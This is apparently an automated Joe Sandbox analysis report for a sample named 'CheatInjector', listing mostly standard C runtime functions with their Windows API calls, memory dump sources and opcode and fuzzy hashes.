                                                                • Instruction ID: 4f0544fe171ea24bee1ed00c021628a895e30390579077f7afc5204ca9e35122
                                                                • Opcode Fuzzy Hash: f2a5f945b118a7eef67039391d814849242d98418d5026994c2356908b5acaf4
                                                                • Instruction Fuzzy Hash: 53212B31A01610EBCB219B21AC94A5B7768EB51764F340237E906AF3D1DE38EE00D6D8
                                                                Function 004C60E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004C60E9
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C60F4
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C6162
                                                                  • Part of subcall function 004C6245: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004C625D
                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 004C610F
                                                                • _Yarn.LIBCPMT ref: 004C6125
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                • String ID: F<L
                                                                • API String ID: 1088826258-2278513700
                                                                • Opcode ID: 5f5af59c2bef781b598a0e0177aaeff25647e2419c0cdc359cb0b9b606b7847f
                                                                • Instruction ID: a7c2da69c3895a57ce9b542247a43fa419d75261a2771be671e0eba17f02197c
                                                                • Opcode Fuzzy Hash: 5f5af59c2bef781b598a0e0177aaeff25647e2419c0cdc359cb0b9b606b7847f
                                                                • Instruction Fuzzy Hash: 1301B13DA005209BCB46EF21C845E7DBB71BF90348B16804EE81167392CF38AE42CB88
                                                                Function 004D18F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A585592C,?,?,00000000,004E3DE9,000000FF,?,004D1881,?,?,004D1855,00000000), ref: 004D1926
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004D1938
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,004E3DE9,000000FF,?,004D1881,?,?,004D1855,00000000), ref: 004D195A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$F<L$mscoree.dll
                                                                • API String ID: 4061214504-357090111
                                                                • Opcode ID: 7862c729d10ffd532ae37e9cbc58c5478b7f8c2977c44be1cc2e842644aeb281
                                                                • Instruction ID: 2a68571cfcff5d2a192bab446683b3e44cbdbfb9db7a151d0eccbf82d749388f
                                                                • Opcode Fuzzy Hash: 7862c729d10ffd532ae37e9cbc58c5478b7f8c2977c44be1cc2e842644aeb281
                                                                • Instruction Fuzzy Hash: 1801F775904659FBDB118F41CC59BAEBBB8FB44721F000577F911A23A0D7789900CB58
                                                                Function 004C68DA Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004C6923
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004C698E
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C69AB
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004C69EA
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C6A49
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004C6A6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide
                                                                • String ID:
                                                                • API String ID: 2829165498-0
                                                                • Opcode ID: d3def3874af13e2813e3ff3c7e7eddb6b9985e493d687dafac3cff1d73b9a92d
                                                                • Instruction ID: 9b06e70faca42ec34a2aee128509081002b7762425b7f3a5b94a8e04f4b933af
                                                                • Opcode Fuzzy Hash: d3def3874af13e2813e3ff3c7e7eddb6b9985e493d687dafac3cff1d73b9a92d
                                                                • Instruction Fuzzy Hash: 3251B076A00206AFDF609F51CC44FAB7BA9EB45744F16C02EFA14E6250DB399C148B58
                                                                Function 004CA09A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,004CA091,004C87BA,004C795C), ref: 004CA0A8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004CA0B6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004CA0CF
                                                                • SetLastError.KERNEL32(00000000,004CA091,004C87BA,004C795C), ref: 004CA121
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 2465d80d126102d38a2682c879f01106a30c8095b17a8936b9abeff44ea696cf
                                                                • Instruction ID: 3b3dcc2b5aad1d2ba98ae4d05696a5c5b647cf17e799b7b059317927a51265cd
                                                                • Opcode Fuzzy Hash: 2465d80d126102d38a2682c879f01106a30c8095b17a8936b9abeff44ea696cf
                                                                • Instruction Fuzzy Hash: 0101923E10C2295EEB952A766C8BF6B2A94EB1277CF60023FF610851E1EF594C15A18D
                                                                Function 004CA1B1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID: F<L
                                                                • API String ID: 1740715915-2278513700
                                                                • Opcode ID: 4aac49524dba41b293f876670454da04d1bcad309c743c611d70b7313b982d07
                                                                • Instruction ID: 48d0c87c0094b69b8f43fd04206753f1a4d7faba8bcfd4608c8b4c553d2e20ee
                                                                • Opcode Fuzzy Hash: 4aac49524dba41b293f876670454da04d1bcad309c743c611d70b7313b982d07
                                                                • Instruction Fuzzy Hash: BF51E47990061A9FDB698F51D841F7AB3A0FF0031DF14456FE80547391E73AACA1DB8A
                                                                Function 004D7261 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D73F9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D740C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: 7rM$7rM
                                                                • API String ID: 885266447-221354421
                                                                • Opcode ID: 4e991e305aacdfd316fc0d30e71ed2a6e524b9604f8927da877c4d0c53268b02
                                                                • Instruction ID: e98e106850e1811d91213c6bca11a7f256baabf3a40c7a6387826e6be391672a
                                                                • Opcode Fuzzy Hash: 4e991e305aacdfd316fc0d30e71ed2a6e524b9604f8927da877c4d0c53268b02
                                                                • Instruction Fuzzy Hash: 5B518E71A04249EFCF14CF99C8A1AAEBBB2EB49310F14805BEC55A7351E7389E41DB54
                                                                Function 004C9EA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004C9EDF
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004C9F93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: F<L$csm
                                                                • API String ID: 3480331319-1887880340
                                                                • Opcode ID: 3bc77c19c134733d439cbddbd4c1aebe363f747761c02a02cd7ec512445467f3
                                                                • Instruction ID: 14c39c8f8a9b08b259a03ef052fc9c8fafab72089b7dbc8a9ced925f6c94aded
                                                                • Opcode Fuzzy Hash: 3bc77c19c134733d439cbddbd4c1aebe363f747761c02a02cd7ec512445467f3
                                                                • Instruction Fuzzy Hash: 8F41D738A00218ABCF40DF29C889F9EBBA5EF05318F14815EF8149B392D7399E41CB95
                                                                Function 004C81DC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RaiseException.KERNEL32(E06D7363,00000001,00000003,">L,?,00000000,?,?,004C3E22,00000000,004ED154,00000000), ref: 004C823C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID: ">L$">L$F<L
                                                                • API String ID: 3997070919-710471601
                                                                • Opcode ID: 69b1c8da9263161cbf8d1e6d92a5b9533fc6b0bb9a1ca301035034053fe00597
                                                                • Instruction ID: 1d2cdc0094468297db4f2d7e2eef6beb7a6ea7819c8778af62541f0b680ce6b2
                                                                • Opcode Fuzzy Hash: 69b1c8da9263161cbf8d1e6d92a5b9533fc6b0bb9a1ca301035034053fe00597
                                                                • Instruction Fuzzy Hash: 4401A779E002099BC7059F98E888FAEBBB8FF84714F15409EE9459B361DB70ED01CB90
                                                                Function 004CB1E2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,004CB193,00000000,00000000,?,?,?,?,004CB2BD,00000002,FlsGetValue,004E5EB8,FlsGetValue), ref: 004CB1EF
                                                                • GetLastError.KERNEL32(?,004CB193,00000000,00000000,?,?,?,?,004CB2BD,00000002,FlsGetValue,004E5EB8,FlsGetValue,00000000,?,004CA14D), ref: 004CB1F9
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,004E5EB8,FlsGetValue,00000000,?,004CA14D), ref: 004CB221
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID: api-ms-
                                                                • API String ID: 3177248105-2084034818
                                                                • Opcode ID: 719dccd86ab49f3e2049b80d7555fd0e3abde2ebe3044ecc28478a1018f1d633
                                                                • Instruction ID: ce2e94b0e6deac75c02d303c3bb1eb4ff33cb356b3aec3a07ae01da2931fb1c0
                                                                • Opcode Fuzzy Hash: 719dccd86ab49f3e2049b80d7555fd0e3abde2ebe3044ecc28478a1018f1d633
                                                                • Instruction Fuzzy Hash: 89E01A34680248BAEB101FA1FC4AF6A3B54EB40B59F144476FA0CE81E1D7659A10D6CD
                                                                Function 004D63AA Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32(A585592C,00000000,00000000,00000000), ref: 004D640D
                                                                  • Part of subcall function 004DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004DA50C,?,00000000,-00000008), ref: 004DABD5
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004D6668
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004D66B0
                                                                • GetLastError.KERNEL32 ref: 004D6753
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                • String ID:
                                                                • API String ID: 2112829910-0
                                                                • Opcode ID: 82ddb7ccd23fc2d5d825737d5ff117abcf06dbe87b9e63d6602432508414e187
                                                                • Instruction ID: c6f6a8c5ebe901e9071cd4b8430103570997a59f27476f5230dd1b342a94baf4
                                                                • Opcode Fuzzy Hash: 82ddb7ccd23fc2d5d825737d5ff117abcf06dbe87b9e63d6602432508414e187
                                                                • Instruction Fuzzy Hash: ABD18875D002589FCF05CFA8D8A09AEBBB5FF09308F19416BE816EB351E734A942CB54
                                                                Function 004DAF45 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004DA50C,?,00000000,-00000008), ref: 004DABD5
                                                                • GetLastError.KERNEL32 ref: 004DAFA9
                                                                • __dosmaperr.LIBCMT ref: 004DAFB0
                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 004DAFEA
                                                                • __dosmaperr.LIBCMT ref: 004DAFF1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 1913693674-0
                                                                • Opcode ID: 720d1ebc2b46c29463c3880c1252fdfc48a03404844a041f2fca0b59c7ca0566
                                                                • Instruction ID: b78ee127e400388ebc5a94f2fc583c27830e42859b82d976d1c568ecd08a3513
                                                                • Opcode Fuzzy Hash: 720d1ebc2b46c29463c3880c1252fdfc48a03404844a041f2fca0b59c7ca0566
                                                                • Instruction Fuzzy Hash: FC21C571700605AFCB21AF62CCA196BB7A9FF4436CB15852FF86597341D738EC108B99
                                                                Function 004D09D6 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8420730f814d494b8b00a54c1f2589936eaff2a8c383fcdbe1bf0c4f4ff7ccd4
                                                                • Instruction ID: d1e040c6978ba5c3e2548aa70ad73fd15fa66bb9e2fe6b9fe369be290df70c7a
                                                                • Opcode Fuzzy Hash: 8420730f814d494b8b00a54c1f2589936eaff2a8c383fcdbe1bf0c4f4ff7ccd4
                                                                • Instruction Fuzzy Hash: D521A131300306AFDB20EFA2ECA1B6B77A9AF61368F14452BF91997351D738EC408759
                                                                Function 004DBEF4 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 004DBEFC
                                                                  • Part of subcall function 004DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004DA50C,?,00000000,-00000008), ref: 004DABD5
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DBF34
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DBF54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 158306478-0
                                                                • Opcode ID: 1f1849453bd30c56d9ad47bd8b7654169b1c895b0f1c86df8a8422140ad24407
                                                                • Instruction ID: 5052c4c4a2fbb36527fdf2393db4b6ac59bef975c882cffee2dc412d596c4d76
                                                                • Opcode Fuzzy Hash: 1f1849453bd30c56d9ad47bd8b7654169b1c895b0f1c86df8a8422140ad24407
                                                                • Instruction Fuzzy Hash: DE11CEB1505605BE6B1167B25CEEC7F6A9CDE853A9712002FF905D2301EF28DD4185BE
                                                                Function 004C2037 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C2043
                                                                • int.LIBCPMT ref: 004C2056
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 004C2B9C
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 004C2BB6
                                                                • std::_Facet_Register.LIBCPMT ref: 004C2089
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C209F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: a1a677aa3afad62dff0f9e04b5c94beb6ed1d4bdbc419c90018a3d7d0423f98d
                                                                • Instruction ID: 3530f994449f8bda8f132e6358cdc66d832582301790617cb103e9d8752b5603
                                                                • Opcode Fuzzy Hash: a1a677aa3afad62dff0f9e04b5c94beb6ed1d4bdbc419c90018a3d7d0423f98d
                                                                • Instruction Fuzzy Hash: 8201D839500614BBC754AF66C945E9E7B689F80364B10415FF602972A1DAB8AF41C788
                                                                Function 004C1ECC Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004C1ED8
                                                                • int.LIBCPMT ref: 004C1EEB
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 004C2B9C
                                                                  • Part of subcall function 004C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 004C2BB6
                                                                • std::_Facet_Register.LIBCPMT ref: 004C1F1E
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004C1F34
